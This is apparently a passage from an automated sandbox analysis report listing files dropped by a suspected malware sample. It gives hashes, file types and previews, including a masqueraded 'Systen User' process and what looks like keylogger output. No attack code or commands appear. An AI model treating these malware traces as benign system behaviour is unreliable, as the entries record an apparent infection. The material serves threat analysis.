                                                                                                              MD5:11C794AFB0C7F6969E1274E7FD12B125
                                                                                                              SHA1:FBC1F70C0F685E3D8CA2C69E10ACDF851DB3B7B7
                                                                                                              SHA-256:ADE39C0F0875647C4A8CD6B2803DCF49A8FE10F408DDB6BF318E07A5B68E2692
                                                                                                              SHA-512:F5ED681AD42EE535AB38FC4E9D67E1D94A48579E8FF0B0EFBA952BF0F9A5F45840064E6F4BE633B67A5C71215D0DDBCCDDF881EE758A9A4EE155C2CE2D62D7F5
                                                                                                              Malicious:false
                                                                                                              Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf5644f26, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1310720
                                                                                                              Entropy (8bit):0.7216819726671622
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:TSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:TazaNvFv8V2UW/DLzN/w4wZi
                                                                                                              MD5:FC04946AA8B17612FB6180E0A26632E1
                                                                                                              SHA1:D9B412A4141078F1F6140A365DAE0990079B41CE
                                                                                                              SHA-256:153CFA1DE222E0E491B67881D220A4EE11E68B42E55950885EFF7B3D21F6B16C
                                                                                                              SHA-512:BD731928D940D41FA38415420246EB1855BD7A3BAC296A49D2E4AB85FA43E551199CD33F6A18ECB064326764D53224D3EDFCE3AEBB935158B9DD52723699E4A7
                                                                                                              Malicious:false
                                                                                                              Preview:.dO&... ...............X\...;...{......................p.D..........{}../...|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{...................................D.P./...|....................8../...|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16384
                                                                                                              Entropy (8bit):0.07932592699955551
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:o/8YeSrZpZew/fgsCrZClW/tdhrcllill+SHY/Xl+/rQLve:oUzuZTewfgs3GDhrUIAS4M
                                                                                                              MD5:17B41D984937961D1FB4C27D712126E5
                                                                                                              SHA1:0606CD2D453A1FD5ADAD87790D48FCC5FBFBA2C4
                                                                                                              SHA-256:8CE2C48D1A801DA1A02A0BCEEB283095A9C5B9B28F37C1717C5A033E98ED4783
                                                                                                              SHA-512:8EDBBFBA4663349D3F7F73B9AEF046B204EA2EB99BEE3B314790A506FF3027D7E28FA646483F4DCA6E86EAF698E980F7B58708DFB62E14185318EA505B9FEA8A
                                                                                                              Malicious:false
                                                                                                              Preview:.........................................;...{.../...|.......{}..............{}......{}.vv_Q.....{}...................8../...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Roaming\Systen User
                                                                                                              File Type:CSV text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):654
                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                              Process:C:\Users\user\Desktop\ozgpPwVAu1.exe
                                                                                                              File Type:CSV text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):654
                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                              Malicious:true
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........................................................
                                                                                                              Process:C:\Users\user\adawsfaefasfasfg.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):116
                                                                                                              Entropy (8bit):3.598349098128234
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:rRSFYJKXzovNsrlvVjFYJKXzovNsrPT4yVjFYJKXzovLvAFYJKXzovX:EFYJKDoWrDFYJKDoWrP0EFYJKDoMFYJp
                                                                                                              MD5:9E590971F66ED2759CDDC1B055DDAAEB
                                                                                                              SHA1:F78096761AF7A5E7B3D9873106C95D3049E2BF65
                                                                                                              SHA-256:D79A8A9D1E13BCFF676485C2CD1332090468C5806034D61782ECFE55F457ADC4
                                                                                                              SHA-512:548B1D02D6903C02C48A8C4094993A60458D49ECFD87F7A292B70D06FF056DFB5112F385667F0B1DB8FC80F5A0CA2E8AEF46E0C59E9D6F24D494F0EAE61AEB1B
                                                                                                              Malicious:false
                                                                                                              Preview:....### explorer ###..[WIN]....### explorer ###..[WIN]rr[WIN][WIN]....### explorer ###..r....### explorer ###..r
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
